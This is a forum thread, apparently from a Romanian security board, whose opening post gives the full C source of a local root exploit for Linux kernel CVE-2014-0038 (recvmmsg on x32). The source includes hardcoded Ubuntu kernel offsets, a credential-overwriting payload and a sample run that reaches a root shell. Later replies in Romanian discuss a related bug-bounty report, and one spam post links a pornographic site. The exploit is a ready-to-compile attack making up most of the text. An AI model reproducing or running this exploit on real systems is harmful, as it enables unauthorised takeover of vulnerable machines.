Elohim Posted February 14, 2014 Report Posted February 14, 2014 /**=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*recvmmsg.c - linux 3.4+ local root (CONFIG_X86_X32=y)CVE-2014-0038 / x32 ABI with recvmmsgby rebel @ irc.smashthestack.org-----------------------------------takes about 13 minutes to run because timeout->tv_sec is decrementedonce per second and 0xff*3 is 765.some things you could do while waiting: * watch http://www.youtube.com/watch?v=OPyZGCKu2wg 3 times * read https://wiki.ubuntu.com/Security/Features and smirk a few times * brew some coffee * stare at the countdown giggly with anticipationcould probably whack the high bits of some pointer with nanoseconds,but that would require a bunch of nulls before the pointer and thenreading an oops from dmesg which isn't that elegant.&net_sysctl_root.permissions is nice because it has 16 trailing nullbyteshardcoded offsets because I only saw this on ubuntu & kallsyms is protectedanyway..same principle will work on 32bit but I didn't really find any majordistros shipping with CONFIG_X86_X32=yuser@ubuntu:~$ uname -aLinux ubuntu 3.11.0-15-generic #23-Ubuntu SMP Mon Dec 9 18:17:04 UTC 2013 x86_64 x86_64 x86_64 GNU/Linuxuser@ubuntu:~$ gcc recvmmsg.c -o recvmmsguser@ubuntu:~$ ./recvmmsgbyte 3 / 3.. ~0 secs left. w00p w00p!# iduid=0(root) gid=0(root) groups=0(root)# sh phalanx-2.6b-x86_64.shunpacking..=greets to my homeboys kaliman, beist, capsl & all of #socialSat Feb 1 22:15:19 CET 2014% rebel %*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=**/#define _GNU_SOURCE#include <netinet/ip.h>#include <stdio.h>#include <stdlib.h>#include <string.h>#include <sys/socket.h>#include <unistd.h>#include <sys/syscall.h>#include <sys/mman.h>#include <sys/types.h>#include <sys/stat.h>#include <fcntl.h>#include <sys/utsname.h>#define __X32_SYSCALL_BIT 0x40000000#undef __NR_recvmmsg#define __NR_recvmmsg (__X32_SYSCALL_BIT + 537)#define VLEN 1#define BUFSIZE 200int port;struct offset { char *kernel_version; unsigned long dest; // net_sysctl_root + 96 unsigned long original_value; // net_ctl_permissions unsigned long prepare_kernel_cred; unsigned long commit_creds;};struct offset offsets[] = { {"3.11.0-15-generic",0xffffffff81cdf400+96,0xffffffff816d4ff0,0xffffffff8108afb0,0xffffffff8108ace0}, // Ubuntu 13.10 {"3.11.0-12-generic",0xffffffff81cdf3a0,0xffffffff816d32a0,0xffffffff8108b010,0xffffffff8108ad40}, // Ubuntu 13.10 {"3.8.0-19-generic",0xffffffff81cc7940,0xffffffff816a7f40,0xffffffff810847c0, 0xffffffff81084500}, // Ubuntu 13.04 {NULL,0,0,0,0}};void udp(int { int sockfd; struct sockaddr_in servaddr,cliaddr; int s = 0xff+1; if(fork() == 0) { while(s > 0) { fprintf(stderr,"\rbyte %d / 3.. ~%d secs left \b\b\b\b",b+1,3*0xff - b*0xff - (0xff+1-s)); sleep(1); s--; fprintf(stderr,"."); } sockfd = socket(AF_INET,SOCK_DGRAM,0); bzero(&servaddr,sizeof(servaddr)); servaddr.sin_family = AF_INET; servaddr.sin_addr.s_addr=htonl(INADDR_LOOPBACK); servaddr.sin_port=htons(port); sendto(sockfd,"1",1,0,(struct sockaddr *)&servaddr,sizeof(servaddr)); exit(0); }}void trigger() { open("/proc/sys/net/core/somaxconn",O_RDONLY); if(getuid() != 0) { fprintf(stderr,"not root, ya blew it!\n"); exit(-1); } fprintf(stderr,"w00p w00p!\n"); system("/bin/sh -i");}typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);_commit_creds commit_creds;_prepare_kernel_cred prepare_kernel_cred;// thx blissstatic int __attribute__((regparm(3)))getroot(void *head, void * table){ commit_creds(prepare_kernel_cred(0)); return -1;}void __attribute__((regparm(3)))trampoline(){ asm("mov $getroot, %rax; call *%rax;");}int main(void){ int sockfd, retval, i; struct sockaddr_in sa; struct mmsghdr msgs[VLEN]; struct iovec iovecs[VLEN]; char buf[BUFSIZE]; long mmapped; struct utsname u; struct offset *off = NULL; uname(&u); for(i=0;offsets[i].kernel_version != NULL;i++) { if(!strcmp(offsets[i].kernel_version,u.release)) { off = &offsets[i]; break; } } if(!off) { fprintf(stderr,"no offsets for this kernel version..\n"); exit(-1); } mmapped = (off->original_value & ~(sysconf(_SC_PAGE_SIZE) - 1)); mmapped &= 0x000000ffffffffff; srand(time(NULL)); port = (rand() % 30000)+1500; commit_creds = (_commit_creds)off->commit_creds; prepare_kernel_cred = (_prepare_kernel_cred)off->prepare_kernel_cred; mmapped = (long)mmap((void *)mmapped, sysconf(_SC_PAGE_SIZE)*3, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0); if(mmapped == -1) { perror("mmap()"); exit(-1); } memset((char *)mmapped,0x90,sysconf(_SC_PAGE_SIZE)*3); memcpy((char *)mmapped + sysconf(_SC_PAGE_SIZE), (char *)&trampoline, 300); if(mprotect((void *)mmapped, sysconf(_SC_PAGE_SIZE)*3, PROT_READ|PROT_EXEC) != 0) { perror("mprotect()"); exit(-1); } sockfd = socket(AF_INET, SOCK_DGRAM, 0); if (sockfd == -1) { perror("socket()"); exit(-1); } sa.sin_family = AF_INET; sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK); sa.sin_port = htons(port); if (bind(sockfd, (struct sockaddr *) &sa, sizeof(sa)) == -1) { perror("bind()"); exit(-1); } memset(msgs, 0, sizeof(msgs)); iovecs[0].iov_base = &buf; iovecs[0].iov_len = BUFSIZE; msgs[0].msg_hdr.msg_iov = &iovecs[0]; msgs[0].msg_hdr.msg_iovlen = 1; for(i=0;i < 3 ;i++) { udp(i); retval = syscall(__NR_recvmmsg, sockfd, msgs, VLEN, 0, (void *)off->dest+7-i); if(!retval) { fprintf(stderr,"\nrecvmmsg() failed\n"); } } close(sockfd); fprintf(stderr,"\n"); trigger();} Quote
tromfil Posted February 14, 2014 Report Posted February 14, 2014 Hmmmhttps://hackerone.com/reports/960 Quote
Byte-ul Posted February 14, 2014 Report Posted February 14, 2014 Hmmmhttps://hackerone.com/reports/960Hmmmhttp://pornhub.com Quote
tromfil Posted February 14, 2014 Report Posted February 14, 2014 (edited) @Byte-ul: D?-?i singur remove la post. Penibil.@Elohim: Aten?ia unora la detalii e 0. Plus c? dac? era normal î?i d?dea seama c? n-am nevoie de posturi din moment ce mi-am ?ters singur vreo 2000, considerate oarecum inutile. S?n?to?i s? fim! Edited February 14, 2014 by tromfil Quote
Elohim Posted February 14, 2014 Author Report Posted February 14, 2014 Byte-ul, defapt tromfil nu a facut un post aiurea, este o adaugire , sau un fix ulterior la exploit-ul initial, deoarece nu este cert ca o sa functioneze, foarte folositor de altfel. Quote
aelius Posted February 14, 2014 Report Posted February 14, 2014 HmmmFree Porn Videos & Sex Movies - Porno, XXX, Porn Tube and Pussy PornThe following errors occurred with your submissionSince this infraction will result in the user being banned you must give a ban reason, which the user will see on the no permission screen.Te las de data asta.// edit: eh, te-a ars alt coleg. asta e, sa va invatati minte. Quote
tromfil Posted February 14, 2014 Report Posted February 14, 2014 Revenind. Cam asta ar trebui s? fac? cei care vor s? înve?e ?i s? vorbeasc? de securitate.Plus, sper c? s-a v?zut suma luat? ?i nici m?car nu era func?ional complet.The Internet Bug Bounty rewarded pageexec with a $3,000 bounty. Zic asta pentru a ar?ta c? merit? s? înva?a?i ?i nu s? v? juca?i cu avioane de clickuri de 1 cent. Quote